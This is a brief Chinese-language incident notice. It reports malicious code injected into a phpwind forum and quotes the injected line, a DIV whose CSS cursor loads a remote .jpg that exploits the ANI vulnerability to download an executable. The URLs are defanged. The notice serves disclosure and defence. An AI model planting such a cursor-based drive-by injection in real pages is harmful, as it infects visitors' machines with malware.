该论坛采用phpwind系统,被加入代码:
/--- <DIV style="CURSOR: url('hxxp://world***ao**fwr.net/level***/75***17*p.jpg')"></DIV> ---/
hxxp://world***ao**fwr.net/level***/75***17*p.jpg(Kaspersky报为Exploit.Win32.IMG-ANI.p)会利用 ANI漏洞 下载hxxp://world***ao**fwr.net/level***/test.exe。
